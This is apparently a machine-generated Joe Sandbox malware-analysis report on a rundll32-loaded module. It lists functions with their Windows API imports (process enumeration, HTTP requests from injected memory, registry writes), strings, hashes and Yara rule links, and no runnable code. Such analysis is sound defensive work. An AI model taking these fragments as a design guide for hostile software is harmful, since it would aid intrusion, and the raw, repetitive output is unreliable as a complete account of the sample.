Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@$??3@
String ID: Catalog_Entries$Num_Catalog_Entries
API String ID: 1245774677-781996053
Opcode ID: 6b8a8c89c4b699f957cd55a4368444c75396a5c1355a13cca8d488b9109841c6
Instruction ID: 9fcea3ce77e1ed4f5330bab62f44b4aa9bf918aefdaa2edac95f8aa4354510da
Opcode Fuzzy Hash: 6b8a8c89c4b699f957cd55a4368444c75396a5c1355a13cca8d488b9109841c6
Instruction Fuzzy Hash: E6C14132205F8481DAA1CF15F98039EB3A4F789BE4F598625EAED47B98CF38C155C744

Uniqueness

Uniqueness Score: -1.00%

Function 000000018004687C Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 248COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 0000000180046A22
??2@YAPEAX_K@Z.MSVCRT ref: 0000000180046A67

Strings

Num_Catalog_Entries, xrefs: 0000000180046924
Catalog_Entries, xrefs: 0000000180046922

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@??3@
String ID: Catalog_Entries$Num_Catalog_Entries
API String ID: 1936579350-781996053
Opcode ID: 37b5463f15d82ba4b2fcb730a9bc1d4a2b4fab43a6711b8c84a700227f9107d3
Instruction ID: d1be57a1d71c98b0b77dd863bddb056ffd98aca7a61043883bc55f1bcd24f70e
Opcode Fuzzy Hash: 37b5463f15d82ba4b2fcb730a9bc1d4a2b4fab43a6711b8c84a700227f9107d3
Instruction Fuzzy Hash: 46A1CB72B01F5882EA55DF25D98439C33A4E708BF8F1A8315EA68477E4EF34C69AC345

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180040418 Relevance: 8.9, APIs: 7, Instructions: 155sleepCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 000000018004048F
LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800404A5
LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800404DD
EnterCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 0000000180040553
LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 0000000180040569
LeaveCriticalSection.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 00000001800405A1
Sleep.KERNEL32(?,?,?,?,00000040,?,000000018001107F), ref: 000000018004061C

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Leave$Enter$Sleep
String ID:
API String ID: 950586405-0
Opcode ID: 5fd251fa728f84f380744b40e651b61ba74c7f1c4af02f91f8a7010bdfac5f08
Instruction ID: e5e3152c6d786b815c8bb063f8079f541e8d353448f2aaa10215c0b82b1e43f2
Opcode Fuzzy Hash: 5fd251fa728f84f380744b40e651b61ba74c7f1c4af02f91f8a7010bdfac5f08
Instruction Fuzzy Hash: E8618C31301A4892FAD69B21EC943DA23A4F78DBE9F66C515ED6A572A1CF38C74DC700

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180010990 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 115registryCOMMON

Download Yara Rule

APIs

RegCreateKeyW.ADVAPI32 ref: 0000000180010A0B
RegSetValueExW.ADVAPI32 ref: 0000000180010AF9
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180010B02
RegCloseKey.ADVAPI32 ref: 0000000180010B0C

Strings

360scan, xrefs: 00000001800109E5

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CloseCreateValue
String ID: 360scan
API String ID: 1818849710-2450673717
Opcode ID: 5bf155bf79df099cab00ad323e7c5f0b1ac545c6889d31c6f531c87adec6c7e2
Instruction ID: 36ede12e68d324247f48980037de7b94a87db2de9e86c0014956a12bc0703eb2
Opcode Fuzzy Hash: 5bf155bf79df099cab00ad323e7c5f0b1ac545c6889d31c6f531c87adec6c7e2
Instruction Fuzzy Hash: 4341B132714B9885F7928B75D8503DC2B70BB8CBE8F549215EEA953BA5DF78C24AC300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180008224 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 55registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 0000000180008249
GetProcAddress.KERNEL32 ref: 0000000180008262
RegCreateKeyExW.ADVAPI32 ref: 00000001800082FB

Strings

Advapi32.dll, xrefs: 0000000180008242
RegCreateKeyTransactedW, xrefs: 0000000180008258

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AddressCreateHandleModuleProc
String ID: Advapi32.dll$RegCreateKeyTransactedW
API String ID: 1964897782-2994018265
Opcode ID: ad3fb016844a3b870c46d04542df6f296797cd153b096fbf22ac7f30fc2e7ae0
Instruction ID: ad22b3d90bad73cc844585d5212e8c39d9a41fcfaef769d6902fd1eabb8e997b
Opcode Fuzzy Hash: ad3fb016844a3b870c46d04542df6f296797cd153b096fbf22ac7f30fc2e7ae0
Instruction Fuzzy Hash: 77210C32619B8482EBA1CB55F8547AAB7A0F7C8BD4F149115EACD07B68CF7CC248CB00

Uniqueness

Uniqueness Score: -1.00%

Function 000000018000E2D8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 000000018000E31F
GetModuleFileNameW.KERNEL32 ref: 000000018000E341
PathAppendW.SHLWAPI ref: 000000018000E385

Strings

cloudcfg.dat, xrefs: 000000018000E379
..\Config\cloudcfg.dat, xrefs: 000000018000E350

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AppendFileModuleNamePathmemset
String ID: ..\Config\cloudcfg.dat$cloudcfg.dat
API String ID: 1620117007-2349577946
Opcode ID: 1df7031f83b1f1459874d000a77c3faa375f56ebc32878d2fd44ce6dffecdc51
Instruction ID: ddd92409ecb0ccec80f2ab3f904b9d803dc2e3fbc70a3a57e8900bd834cf0119
Opcode Fuzzy Hash: 1df7031f83b1f1459874d000a77c3faa375f56ebc32878d2fd44ce6dffecdc51
Instruction Fuzzy Hash: DD216F71204A8881EA91DB11E8443DE7360F78ABD9F90C211FA9947AE9DF7DC74DCB00

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180074A30 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 0000000180074A58
GetProcAddress.KERNEL32 ref: 0000000180074A6E
FreeLibrary.KERNEL32 ref: 0000000180074A87

Strings

CorExitProcess, xrefs: 0000000180074A67
mscoree.dll, xrefs: 0000000180074A4F

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: c2f829957779a5f3283623a795060286876ebd1f64ff5d399dec1781f672f9f2
Instruction ID: e395451e8db6c2212d1c7d058d3e5d590d561a96988dee0adbc21a3ed47a46ec
Opcode Fuzzy Hash: c2f829957779a5f3283623a795060286876ebd1f64ff5d399dec1781f672f9f2
Instruction Fuzzy Hash: 3CF0903120070491EEA28B64A84439A2360FB8C7E1F548619E67A4A2F4CF3DC34DC300

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180018AE8 Relevance: 7.7, APIs: 5, Instructions: 244COMMON

Download Yara Rule

APIs

Part of subcall function 000000018004388C: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180043AB7

??_V@YAXPEAX@Z.MSVCRT ref: 0000000180018C88
??_V@YAXPEAX@Z.MSVCRT ref: 0000000180018CA9

Part of subcall function 0000000180044250: EnterCriticalSection.KERNEL32 ref: 0000000180044280
Part of subcall function 0000000180044250: LeaveCriticalSection.KERNEL32 ref: 00000001800442BA

??_V@YAXPEAX@Z.MSVCRT ref: 0000000180018E36

Part of subcall function 0000000180042ADC: ??_V@YAXPEAX@Z.MSVCRT ref: 0000000180042B9A

Part of subcall function 0000000180018AE8: ??3@YAXPEAX@Z.MSVCRT ref: 0000000180018C64

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$??3@EnterLeave
String ID:
API String ID: 3906572401-0
Opcode ID: 8704770b73637da07f2765808fbc5d80e4dde8a3e535cddf5f679fa9373d9d11
Instruction ID: 485792f3aa206c277c5c0904b00aba5ea33dd2ed139350c249341fca4c3fabed
Opcode Fuzzy Hash: 8704770b73637da07f2765808fbc5d80e4dde8a3e535cddf5f679fa9373d9d11
Instruction Fuzzy Hash: 5CB15732B05B448AEB51CFA0A8407DD33F5F748798F144526EE9867B88DF34C65AD354

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC8514D8 Relevance: 7.7, APIs: 5, Instructions: 176processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 00000187EC8514FA
Process32First.KERNEL32 ref: 00000187EC851548
wsprintfA.USER32 ref: 00000187EC851693
wsprintfA.USER32 ref: 00000187EC85172D
Process32Next.KERNEL32 ref: 00000187EC85184F

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: Process32wsprintf$CreateFirstNextSnapshotToolhelp32
String ID:
API String ID: 4137211488-0
Opcode ID: 5ae15c8b8c9fac1bc2260a3d73dec5e15d910bbb577535e29febeca4dfee412a
Instruction ID: bdecd132b1b5457293da071eaac0e79742ccf1c2c6d441cb1cabd65e88074f0b
Opcode Fuzzy Hash: 5ae15c8b8c9fac1bc2260a3d73dec5e15d910bbb577535e29febeca4dfee412a
Instruction Fuzzy Hash: CE91EB7A22DB8196DA60DB14E5C03DAB7A5F7C4380F608165AB8D43BE9EF7CC645CB40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180070F00 Relevance: 7.7, APIs: 5, Instructions: 174COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.MSVCRT ref: 0000000180070F36

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: _errno
String ID:
API String ID: 2918714741-0
Opcode ID: 8b2e5358ef7994b7672dda4e212676a9332a6cdbfea30cd8ee4f2d86f2200a94
Instruction ID: 273587a47ae5326c80e6ba55da8392b357747b6508265d18e5e13f97f53468fd
Opcode Fuzzy Hash: 8b2e5358ef7994b7672dda4e212676a9332a6cdbfea30cd8ee4f2d86f2200a94
Instruction Fuzzy Hash: 7471A572204B88CAE7AA8F19A4403EE77A4FB887D4F148115FE9947BD4DF3AC604C700

Uniqueness

Uniqueness Score: -1.00%

Function 00000187EC855030 Relevance: 7.6, APIs: 5, Instructions: 122networkCOMMON

Download Yara Rule

APIs

HttpOpenRequestA.WININET ref: 00000187EC855168
HttpOpenRequestA.WININET ref: 00000187EC8551E8
InternetSetOptionA.WININET ref: 00000187EC855227
HttpSendRequestA.WININET ref: 00000187EC855273
HttpSendRequestA.WININET ref: 00000187EC855294

Memory Dump Source

Source File: 00000006.00000002.2138444968.00000187EC850000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000187EC850000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_187ec850000_rundll32.jbxd

Yara matches

Similarity

API ID: HttpRequest$OpenSend$InternetOption
String ID:
API String ID: 664753792-0
Opcode ID: 7ca2387c2bbf1a7d28999812ac2f6f2864370cd4003b28c3ab5a0417524daa68
Instruction ID: 096f1d53eb15543a26bc3c0806465e958d4ee6f22aa700c433f0b2cf1d3fb6e7
Opcode Fuzzy Hash: 7ca2387c2bbf1a7d28999812ac2f6f2864370cd4003b28c3ab5a0417524daa68
Instruction Fuzzy Hash: 7B61B77A52DB80D6E7618B14F5903DAB7A0F3C5784F608056E78943BA8DFBDC648CB44

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180016CA8 Relevance: 7.6, APIs: 5, Instructions: 114COMMONLIBRARYCODE

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 0000000180016D26
??2@YAPEAX_K@Z.MSVCRT ref: 0000000180016D4B
memmove.MSVCRT(?,?,?,0000000180016E29), ref: 0000000180016D69
??3@YAXPEAX@Z.MSVCRT ref: 0000000180016DA1
memmove.MSVCRT(?,?,?,?,?,?,?,0000000180016E29), ref: 0000000180016E10

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@memmove$??3@
String ID:
API String ID: 232491532-0
Opcode ID: 36aecff153c17e78cc281762afab7df910fd19be64e25fb5c31b0b5d4ec441f6
Instruction ID: 28467c757ab6f7ef32b6ddf95ff48fc265dfbbceda238bfa6dff49904db51385
Opcode Fuzzy Hash: 36aecff153c17e78cc281762afab7df910fd19be64e25fb5c31b0b5d4ec441f6
Instruction Fuzzy Hash: 0C41C432B05B8881EF568B16F9403996361E748BE0F548725AB7A07BE9DF78C6958340

Uniqueness

Uniqueness Score: -1.00%

Function 000000018006A658 Relevance: 7.6, APIs: 5, Instructions: 113COMMON

Download Yara Rule

APIs

_swprintf_c_l.LIBCMT ref: 000000018006A6B0
memmove.MSVCRT(00000000,00000008,00000000,000000018006AA37,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 000000018006A6DB
memmove.MSVCRT(00000000,00000008,00000000,000000018006AA37,?,?,?,?,?,?,?,?,?,?,00000003,?), ref: 000000018006A755

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: memmove$_swprintf_c_l
String ID:
API String ID: 3930809162-0
Opcode ID: 4d957fd311e85dbc9e9e1d2fcdfd49009c8516e907acacc0d6bfdbff04455b87
Instruction ID: 2e3324a3b5d682f35c297bfefc02d538748b26edc97be9d81ac6111acbd6bae8
Opcode Fuzzy Hash: 4d957fd311e85dbc9e9e1d2fcdfd49009c8516e907acacc0d6bfdbff04455b87
Instruction Fuzzy Hash: 0A41E33231875496EBA5DA26D90079A67A2BB4DBC0F248015AF1A43F41DE35D6688B40

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180044CE4 Relevance: 7.6, APIs: 6, Instructions: 110COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32 ref: 0000000180044D24
LeaveCriticalSection.KERNEL32 ref: 0000000180044D3A
LeaveCriticalSection.KERNEL32 ref: 0000000180044D71
EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0000000180044EED), ref: 0000000180044DDC
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0000000180044EED), ref: 0000000180044DF2
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,0000000180044EED), ref: 0000000180044E29

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: CriticalSection$Leave$Enter
String ID:
API String ID: 2978645861-0
Opcode ID: 84f7991fb58de1b865a10277cce647e74e53e0d7bb9d3c9fb8eb0733b83dca90
Instruction ID: 73bd4c9cd9396375e0c1b942217bf14bfc10cb3082dae23d56ea31479293823c
Opcode Fuzzy Hash: 84f7991fb58de1b865a10277cce647e74e53e0d7bb9d3c9fb8eb0733b83dca90
Instruction Fuzzy Hash: 19413932641B0896FA869F21EC943E83764F749FD9F598115EAA50B3A5CF28C74EC304

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180016090 Relevance: 7.6, APIs: 5, Instructions: 99COMMON

Download Yara Rule

APIs

??2@YAPEAX_K@Z.MSVCRT ref: 000000018001611F
??2@YAPEAX_K@Z.MSVCRT ref: 0000000180016144
memmove.MSVCRT(?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 000000018001616B
??3@YAXPEAX@Z.MSVCRT ref: 00000001800161A1
memmove.MSVCRT(?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800161AB

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: ??2@memmove$??3@
String ID:
API String ID: 232491532-0
Opcode ID: 4c8a09d1fefffe74558815fc45e4f8bd62bc61723e2fbaaf498aee53098e704a
Instruction ID: 3308181ea52ff5a0dd97f5d36b69886329373971ad435e2f25c4df82c4de258d
Opcode Fuzzy Hash: 4c8a09d1fefffe74558815fc45e4f8bd62bc61723e2fbaaf498aee53098e704a
Instruction Fuzzy Hash: 8231D332705B8894EF5ACF16D9443986362F709FE0F588615EE6E07BE6DE78D299C300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800161EC Relevance: 7.6, APIs: 5, Instructions: 96COMMON

Download Yara Rule

APIs

memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 0000000180016298
memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162A6
??3@YAXPEAX@Z.MSVCRT ref: 00000001800162DE
memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162E8
memmove.MSVCRT(?,?,?,7FFFFFFFFFFFFFFF,?,?,?,?,?,?,000000C8,0000000180015AD6), ref: 00000001800162F6

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: memmove$??3@
String ID:
API String ID: 2321372689-0
Opcode ID: 2a291cfa02ae191c963c7aa5d4289e2a243c3539a711814b18b996a7d7b87c53
Instruction ID: b2b38ff55e60cbfe57fc328909b4bad170525be2db7207aa5bf6da73de3f6202
Opcode Fuzzy Hash: 2a291cfa02ae191c963c7aa5d4289e2a243c3539a711814b18b996a7d7b87c53
Instruction Fuzzy Hash: 7831D272700A8891DB569F12E9043DE6351F748FD0F948522EF5E4BBA6DE3CC259C300

Uniqueness

Uniqueness Score: -1.00%

Function 00000001800442DC Relevance: 7.6, APIs: 5, Instructions: 91COMMON

Download Yara Rule

APIs

??3@YAXPEAX@Z.MSVCRT ref: 0000000180044380
memmove.MSVCRT(?,00000001,?,0000000180043D7F), ref: 000000018004439C
memmove.MSVCRT(?,00000001,?,0000000180043D7F), ref: 00000001800443B5
memmove.MSVCRT(?,00000001,?,0000000180043D7F), ref: 00000001800443CB
memmove.MSVCRT(?,00000001,?,0000000180043D7F), ref: 00000001800443D9

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138222360.00000001800C6000.00000008.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138257223.000000018016C000.00000002.00000001.01000000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd

Similarity

API ID: memmove$??3@
String ID:
API String ID: 2321372689-0
Opcode ID: d7a3fd22b0ebd3110ce60677b93657e49589d130bcba2fb1c65b72589847b85a
Instruction ID: 762f5997fa826d969e67cf094c143b4ceaf1448be14793aa958531d929a095e6
Opcode Fuzzy Hash: d7a3fd22b0ebd3110ce60677b93657e49589d130bcba2fb1c65b72589847b85a
Instruction Fuzzy Hash: 8231A172300E9885D94AEE5286843DCA765F74DFD4F66C521BF680BB96CE38D24AC304

Uniqueness

Uniqueness Score: -1.00%

Function 0000000180057FF0 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

WindowFromPoint.USER32 ref: 000000018005802B
GetAncestor.USER32 ref: 0000000180058051
GetWindowRect.USER32 ref: 0000000180058071
memset.MSVCRT ref: 00000001800580D5
StrCmpIW.SHLWAPI ref: 00000001800580F6

Memory Dump Source

Source File: 00000006.00000002.2138015920.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true

Associated: 00000006.00000002.2137989334.0000000180000000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138166985.0000000180086000.00000002.00000001.01000000.00000000.sdmpDownload File
Associated: 00000006.00000002.2138205778.00000001800C5000.00000004.00000001.01000000.00000000.sdmpDownload File
